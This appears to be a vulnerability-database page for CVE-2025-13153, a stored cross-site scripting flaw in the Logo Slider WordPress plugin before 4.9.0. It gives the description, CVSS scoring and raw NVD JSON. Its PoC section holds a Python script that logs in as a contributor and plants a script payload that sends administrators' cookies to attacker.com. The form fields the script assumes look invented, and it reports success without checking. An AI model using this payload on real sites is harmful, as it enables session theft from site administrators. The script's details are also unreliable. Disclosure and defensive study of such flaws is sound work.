Security Vulnerability Report
中文
CVE-2025-13153 CVSS 6.1 MEDIUM

CVE-2025-13153

Published: 2026-01-02 06:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Logo Slider WordPress plugin before 4.9.0 does not validate and escape some of its slider options before outputting them back in the dashboard, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Logo Slider WordPress plugin < 4.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-13153 PoC - Logo Slider WordPress Plugin Stored XSS # Target: WordPress site with Logo Slider plugin < 4.9.0 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "contributor_user" PASSWORD = "user_password" def get_nonce(login_html): """Extract WordPress nonce from login page""" match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', login_html) return match.group(1) if match else None def login(): """Authenticate to WordPress""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" resp = session.get(login_url) nonce = get_nonce(resp.text) login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "_wpnonce": nonce, "redirect_to": "/wp-admin/" } session.post(login_url, data=login_data) return session def inject_xss_payload(session): """Inject stored XSS payload via plugin's slider options""" # Malicious payload - steals admin cookies xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>' # Create/Edit slider with malicious option slider_url = f"{TARGET_URL}/wp-admin/admin.php?page=logo-slider-settings" # The plugin stores slider options without sanitization slider_data = { "slider_name": "Malicious Slider", "slider_options": xss_payload, # XSS payload injected here "submit": "Save" } session.post(slider_url, data=slider_data) print("[+] XSS payload injected successfully") print("[*] Payload will execute when admin views the slider settings page") if __name__ == "__main__": print("[*] CVE-2025-13153 - Logo Slider Stored XSS PoC") session = login() inject_xss_payload(session)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13153", "sourceIdentifier": "[email protected]", "published": "2026-01-02T06:15:53.423", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Logo Slider WordPress plugin before 4.9.0 does not validate and escape some of its slider options before outputting them back in the dashboard, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks."}, {"lang": "es", "value": "El plugin de WordPress Logo Slider anterior a la versión 4.9.0 no valida ni escapa algunas de sus opciones de slider antes de mostrarlas de nuevo en el panel de control, lo que podría permitir a usuarios con el rol de colaborador y superiores realizar ataques de cross-site scripting almacenado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/0ed67947-228d-420c-8d28-e0d7326eb101/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.